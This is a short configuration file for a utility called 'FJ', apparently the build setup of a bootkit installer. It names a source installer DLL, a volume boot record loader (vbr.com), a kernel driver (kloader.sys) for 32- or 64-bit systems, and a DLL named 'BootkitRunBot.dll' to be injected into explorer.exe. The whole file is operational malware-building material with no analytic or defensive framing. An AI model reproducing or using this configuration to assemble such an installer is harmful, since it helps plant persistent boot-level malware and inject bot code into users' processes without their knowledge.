;The configuration file for the utility FJ
;It describes the drivers and libraries that must be attached to the installer
;When you run the installer detects bit operating system and installs the appropriate driver

;The original installer file (can be either EXE, or DLL)
SOURCE: ..\bin\Release\i386\setupdll.dll

;The file in which the result will be recorded
OUT: Release\setupdll.dll

;Bootloader
BIN: Release\vbr.com

;Driver for 32-bit OS
DRV: ..\bin\Release\i386\kloader.sys


;Driver for the 64-bit OS
;DRV: ..\bin\release\amd64\kloader.sys

;32x-bit DLL
DLL: BootkitRunBot.dll
;Process list where 32-bit DLL Inject
explorer.exe